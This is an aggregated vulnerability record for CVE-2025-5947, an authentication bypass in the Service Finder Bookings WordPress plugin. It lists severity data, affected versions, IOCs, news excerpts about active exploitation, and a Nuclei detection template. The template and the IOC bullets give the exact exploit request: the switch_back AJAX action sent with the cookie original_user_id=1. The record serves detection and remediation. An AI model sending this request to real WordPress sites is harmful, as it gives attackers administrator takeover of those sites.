CVE-2025-5947
Published 2025-08-01
CVE-2025-5947: The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0.
Priority: P187 · Severity: critical · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 5.70% (92.0th percentile)
The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to log in as any user, including admins.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aonetheme | service_finder_bookings | <= 6.0 | — |
Detection & IOCs (extracted from sources)
- cookie: original_user_id=1
- url: /wp-admin/admin-ajax.php?action=service_finder_switch_back
- path: /wp-content/plugins/sf-booking/
Nuclei template:

```yaml
id: CVE-2025-5947
info:
  name: Service Finder Bookings - Authentication Bypass
  author: sedat4ras
  severity: critical
http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
        Host: {{Hostname}}
        Cookie: original_user_id=1
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?i)Location:.*\/wp-admin\/'
      - type: regex
        part: header
        regex:
          - '(?i)Set-Cookie:.*wordpress_logged_in_'
      - type: status
        status:
          - 301
          - 302
```

- Exploit requests are HTTP GET to /wp-admin/admin-ajax.php with the query parameter switch_back=1 and a manipulated original_user_id cookie value (e.g., =1 for admin).
- Review access logs for suspicious newly created accounts that may have been added for persistence after exploitation.
- Presence of the sf-booking plugin directory at /wp-content/plugins/sf-booking/ can be used to identify vulnerable targets via passive recon (publicwww).
- The vulnerability only affects Service Finder Bookings plugin versions up to and including 6.0; version 6.1 (released July 17) contains the fix.
- Attacker IP addresses used for the campaign are not static; blocklisting the five identified IPs is a partial mitigation only, as attackers can rotate to new ones.
CVSS provenance
- nvd (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- vulncheck: 9.8 CRITICAL
GHSA
GHSA-x2xx-4qhp-2vqx (ghsa_unreviewed · 2025-08-01): CVE-2025-5947 [CRITICAL] CWE-639
The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0 (same description as above).
VulnCheck
CVE-2025-5947 [CRITICAL] Authorization Bypass Through User-Controlled Key (vulncheck · 2025 · CVSS 9.8)
Description: same as above (improper validation of the user cookie in service_finder_switch_back(), allowing unauthenticated login as any user, including admins).
Affected: aonetheme Service Finder Bookings plugin for WordPress
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/blog/2025/10/attackers-actively-exploiting-critical-vulnerability-in-service-fi
No detection rules found.
Nuclei
CVE-2025-5947 [CRITICAL] Service Finder Bookings - Authentication Bypass (nuclei · CVSS 9.8)
Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of the user cookie in the service_finder_switch_back() function, letting unauthenticated attackers log in as any user, including admins.
Template:

```yaml
id: CVE-2025-5947
info:
  name: Service Finder Bookings - Authentication Bypass
  author: sedat4ras
  severity: critical
  description: |
    Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
  impact: |
    Unauthenticated attackers can login as any user, including administrators, leading to full system compromise.
  remediation: |
```
Bleepingcomputer
[CRITICAL] Hackers exploit critical auth bypass flaw in JobMonster WordPress theme (blogs_bleepingcomputer · 2025-11-04 · CVSS 9.8)
## Hackers exploit critical auth bypass flaw in JobMonster WordPress theme
By Bill Toulas
Threat actors are targeting a critical vulnerability in the JobMonster WordPress theme that allows hijacking of administrator accounts under certain conditions.
The malicious activity was detected by Wordfence, a WordPress security firm, after blocking multiple exploit attempts against its clients over the past 24 hours.
JobMonster, created by NooThemes, is a premium WordPress theme used by job listing sites, recruitment/hiring portals, candidate search tools, etc. The theme has over 5,500 sales on Envato.
The exploited vulnerability is identified as CVE-2025-5397 and has a critical-severity score of 9.8. It is an authentication bypass problem that impacts all versions of the theme up to 4.8.1.
Bleepingcomputer
[CRITICAL] Hackers exploit auth bypass in Service Finder WordPress theme (blogs_bleepingcomputer · 2025-10-08 · CVSS 9.8)
## Hackers exploit auth bypass in Service Finder WordPress theme
By Bill Toulas
Threat actors are actively exploiting a critical vulnerability in the Service Finder WordPress theme that allows them to bypass authentication and log in as administrators.
Administrator privileges in WordPress grant full control over content and settings, permission to create accounts, upload PHP files, and export databases.
WordPress plugin security firm Wordfence recorded more than 13,800 exploitation attempts since August 1st.
Service Finder is a premium WordPress theme designed for service directory and job board websites. It supports customer booking, feedback, time slot management, staff management, invoice generation, and a payment system.
The theme has more than 6,000 sales on Envato Market, and like
References:
- https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c1fe4f60-d93b-4071-90ae-ac863c17fe19?source=cve
- https://www.vicarius.io/vsociety/posts/cve-2025-5947-detect-wordpress-vulnerability
- https://www.vicarius.io/vsociety/posts/cve-2025-5947-mitigate-wordpress-vulnerability